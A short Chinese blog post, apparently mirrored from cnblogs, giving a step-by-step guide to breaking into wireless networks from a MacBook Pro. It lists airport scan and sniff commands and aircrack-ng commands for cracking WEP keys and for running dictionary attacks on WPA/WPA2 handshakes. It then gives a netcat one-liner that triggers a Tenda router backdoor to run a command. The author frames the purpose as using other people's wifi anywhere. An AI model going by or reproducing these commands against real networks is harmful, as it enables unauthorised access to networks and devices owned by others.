zoukankan      html  css  js  c++  java
  • 利用MacBookPro入侵无线网络

    目前无线网络的加密方式主要有WEP,WPA/WPA2。这是最常看到的加密方式,最近由于需要,专门去研究了一下如何入侵无线网络。

    1、入侵WEP加密的无线网络

    WEP加密方式现在已经很不安全了,因为只要通过一定量的数据包,就可以穷举出密码,无论密码多么复杂,也最多需要几分钟而已。

    WEP的秘钥分为5位和13位。

    入侵主要流程:

    1)先查看附近的wifi信号

    airport -s

    2)选定其中一个wifi信号,看到其所在的频道,开始监听抓包

    sudo airport en0 sniff 11

    en0 代表无线网卡,11代表要监听的无线信号在11频道上,此时笔记本进入了监听阶段,抓到的包保存为/tmp/airportSniffxxxxx.cap

    3)此时我们可以一边抓包,一边进行解密

    aircrack-ng -1 -a 1 -e xx:xx:xx:xx:xx:xx /tmp/airportSniffxxxxx.cap

    -e 代表目的MAC地址

    -a 1 代表使用WEP破解方式

    只要包到达了一定数量,密码很快就出来了。

    注:对于13位的WEP,需要等多的数据包,例外,在数据包足够多时,但是又破解不出来的时候,可以尝试下提高 -f 影响因子的大小(默认为2),可以尝试提高到1024等。

    2、入侵WPA/WPA2加密的无线网络

    WPA/WPA2相对于WEP来说安全了很多,但是也存在着很大的隐患,虽然不会像WEP那样通过数据包直接分析出来了,但是需要获得了一次handshake,就可以用过字典暴力破解的方法获得秘钥。现在网上不管是弱密码还是已有的泄露的密码,都能找到很多,搜集整理出来一份很好地字典就能走到哪里都有无线可以蹭了。

    入侵主要流程:

    1)先查看附近的wifi信号

    airport -s

    2)选定其中一个wifi信号,看到其所在的频道,开始监听抓包

    sudo airport en0 sniff 11

    en0 代表无线网卡,11代表要监听的无线信号在11频道上,此时笔记本进入了监听阶段,抓到的包保存为/tmp/airportSniffxxxxx.cap

    3)此时我们可以一边抓包,一边进行解密

    aircrack-ng -w password.txt -e xx:xx:xx:xx:xx:xx /tmp/airportSniffxxxxx.cap

    -w 后面代表字典文件

    只要拥有一个handshake,就可以开始跑字典破解了。handshake是在监听阶段,有用户重新连接到无线上,就是一个handshake。

    3、Tenda路由器后门利用

    echo -ne "w302r_mfgx00x/bin/ls" | nc -u -q 5 192.168.0.1 7329

    漏洞原理及利用:http://netsecurity.51cto.com/art/201310/413552.htm

  • 相关阅读:
    【POJ 3162】 Walking Race (树形DP-求树上最长路径问题,+单调队列)
    【POJ 2152】 Fire (树形DP)
    【POJ 1741】 Tree (树的点分治)
    【POJ 2486】 Apple Tree (树形DP)
    【HDU 3810】 Magina (01背包,优先队列优化,并查集)
    【SGU 390】Tickets (数位DP)
    【SPOJ 2319】 BIGSEQ
    【SPOJ 1182】 SORTBIT
    【HDU 5456】 Matches Puzzle Game (数位DP)
    【HDU 3652】 B-number (数位DP)
  • 原文地址:https://www.cnblogs.com/dgy5554/p/3973404.html
Copyright © 2011-2022 走看看